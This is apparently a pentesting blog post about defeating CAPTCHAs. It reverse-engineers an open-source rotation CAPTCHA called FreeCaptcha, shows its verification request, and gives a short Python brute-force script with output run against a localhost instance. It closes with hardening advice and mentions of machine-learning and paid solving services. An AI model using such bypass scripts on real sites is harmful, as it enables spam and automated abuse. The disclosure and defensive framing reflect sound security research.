We all know what it’s like – you need to log in to a site, so you have to select the motorboats from a bunch of tiny pictures. Modern Captcha systems like hCaptcha, FunCaptcha, and Google’s ReCAPTCHA have come a long way since the old days of squiggly text. But what tools are available to pentesters who need to defeat Captcha programmatically as part of a job?
OCR (Ocular Character Recognition) algorithms quickly defeated even the most advanced classic Captchas. Admins tried to protect their forums from the deluge of spam. They made the characters even harder to read, but this was inconvenient for legitimate users. When Google announced ReCaptcha, an easy-to-use new system based on machine learning, webmasters worldwide rejoiced.
But it wasn’t long until hackers caught up.
Let’s look at how attackers bypass Captcha to spam “protected” websites. To do so, we’ll develop our own script for defeating a modern, open-source Captcha system. Whether it’s bypassing a login form or “proving” your human to scrape a social media site, we’ll equip you with the tactics you need to get past modern Captcha systems.
Selecting a system to crack
To start out, we need to pick a specific Captcha system that we want to attack. Everyone targets ReCaptcha, so let’s try something a bit more original. I’ve always been a fun of the FunCaptcha’s used by Github and Twitch, although I’d prefer an open-source alternative that doesn’t require JavaScript.
Luckily, the University of Constantinople’s infosec research team made FreeCaptcha. Their new tool works similar to FunCaptcha, in that it asks the user to rotate an image until it’s upright. However, unlike FunCaptcha, this tool is free, open-source, and uses no JS. For any privacy fans, that last feature will be especially interesting. No JS means that Tor users will be more comfortable with FreeCaptcha.
Great, so we’ve got a free and open-source Captcha that’s also popular and modern. We’re ready to start hacking!
Hacking FreeCaptcha
We’ll start by reverse engineering FreeCaptcha. If we just look at the HTML, we see that it uses a bunch of nested, transparent checkboxes. The design is wild. Each time you click, you check another checkbox. When you click “Done?”, you actually submit a form within an iframe. The network request looks like this:
POST /verify_captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Cookie: freecaptcha=d45f489a-1b81-4687-996c-f42cb4432239
Content-Length: 74
btnControl4=on&btnControl3=on&btnControl2=on&btnControl1=on&btnControl0=on
That post data at the end? Those are all the buttons we clicked. The backend will then verify that this is the right number of clicks to have rotated the image upright. If so, our FreeCaptcha cookie will be “blessed” as having passed the challenge. Phew!
So how do we beat this? Well, the image can only appear in one of six angles. Thus, we can just guess and we’ll be right 16% of the time. If we write our script to guess a bunch of times in a row, it shouldn’t take long to guess right.
Here’s a quick Python script to get a quicky that has “passed” the challenge:
import requests
captcha_page = 'http://localhost:5000'
captcha_defeated = False
while not captcha_defeated:
print('Attempting to bruteforce freecaptcha verification...')
# Get a fresh freecaptcha cookie
s = requests.Session()
s.get(captcha_page + '/captcha')
# Guess that the image isn't rotated at all
# (easiest thing to guess, will be true 1/6 times)
resp = s.post(captcha_page + '/verify_captcha')
if resp.status_code == 200:
captcha_defeated = True
print('Cookie that has passed the challenge:')
print(s.cookies.get('freecaptcha'))
It just keeps trying again and again. Let’s see how many tries it actually takes for our script to get a valid cookie that has passed the challenge.
$ python3 hack_fc.py
Attempting to bruteforce freecaptcha verification...
Attempting to bruteforce freecaptcha verification...
Attempting to bruteforce freecaptcha verification...
Cookie that has passed the challenge:
316da094-8259-42f4-8266-5f9739eeb661
According to the time Linux command, the run time is… 0.07 seconds. Wow.
Making It Harder to Defeat Captcha
After seeing these results, I emailed the lead developer of FreeCaptcha. I wanted to see if these results might help him improve FreeCaptcha.
He wrote back:
Our goal with FreeCaptcha was to make a free, open source, pro-privacy tool as strong as commercial offerings on the market. Sadly, that’s a low bar. Thanks for the free pentest, we’ll make freecaptcha v2 much stronger using this feedback.
Jesus Aviles, FreeCaptcha lead dev
That’s great news. Specifically, I suggested that rotating one single image is just too easy. Instead, users should have to rotate several smaller images. ReCaptcha and hCaptcha even require users to identify two separate pages of images. However, for a rotation-based tool like FreeCaptcha, two pages of challenges would just be overkill.
Let’s do the math, and see how many requests it would take for an attacker to brute force a challenge where they have to rotate six images.
A single image has a chance of 1/6. Each additional image we add to the challenge multiplies the difficulty by 1/6. So with six challenge images, the odds of guessing the exact rotation of each image using brute force would be…
46,656 network requests should be more than enough to keep out all but the most persistent, sophisticated enemies. Your forum script kiddie won’t defeat Captcha with those odds. But is Captcha really just a numbers game, or does a strong Captcha system need other ingredients?
Other Ways to Defeat Captcha
Bruteforce isn’t the only game in town. Recall that security searches defeated classic Captcha using OCR, not brute force. The biggest existential threat to modern Captcha is machine learning. What kinds of deep learning networks out there can detect rotated images?
The closest solution is RotNet. This ML library corrects the orientation of images. Only a sophisticated attacker is likely to get this working against FreeCaptcha, but it shows that the possibility is there. Defenders using FreeCaptcha can fight back by finding which types of images RotNet struggles to correct, and using those for their Captcha challenges.
Of course, there’s always the menace of Captcha solving services.
With anti-captcha.com, hackers can pay for workers in the developing world to solve 1,000 Captchas for 50 cents. Prices this low mean for just a few dollars, anyone can defeat Captcha. Mainstream services like Google and hCaptcha could make this harder for bad actors by implementing fingerprinting. That way, if you switch IP address or user-agent, they assume you’re a bot.
FreeCaptcha could follow this approach, but what about Tor? I suppose for now they’ll just have to add this feature for non-Tor users. It’s a problem no one has solved yet.